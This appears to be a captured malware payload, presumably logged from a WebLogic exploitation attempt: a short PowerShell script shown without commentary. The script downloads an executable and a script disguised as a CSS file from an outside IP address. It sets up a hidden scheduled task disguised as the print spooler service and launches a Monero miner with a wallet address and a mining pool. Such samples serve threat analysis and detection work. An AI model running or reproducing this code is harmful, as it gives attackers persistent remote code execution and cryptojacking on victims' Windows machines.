wls_vuln_attempt_94.177.123.123_windows

1. if((Get-Process spoosvc ) -eq $null){
2. $xurl="http://94.177.123.123/css/6Ov4ZHOg.exe"
3. $purl="http://94.177.123.123/css/bootstrap.css"
4. $xop="$env:programdata\spoosvc.exe"
5. $pop="$env:programdata\msupdate.ps1"
6. $wc=New-Object System.Net.WebClient
7. $wc.DownloadFile($xurl,$xop)
8. $wc.DownloadFile($purl,$pop)
9. SchTasks.exe /Create /SC MINUTE /TN "Spooler SubSystem Service" /TR "powershell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit -File $env:programdata\msupdate.ps1" /MO 6 /F
10. cmd.exe /c $env:programdata\spoosvc.exe -o pool.supportxmr.com -u 45KCADTpEL1eiRJmjHfVAkCzgy8wR19uuZ7mfYkXKUEjhCjpxwQYeRViAb3PTdjRPyMyFth7c6PihEwCBjWSH9uX8uksGhm -p n -k -B --max-cpu-usage=50 --donate-level=1
11. }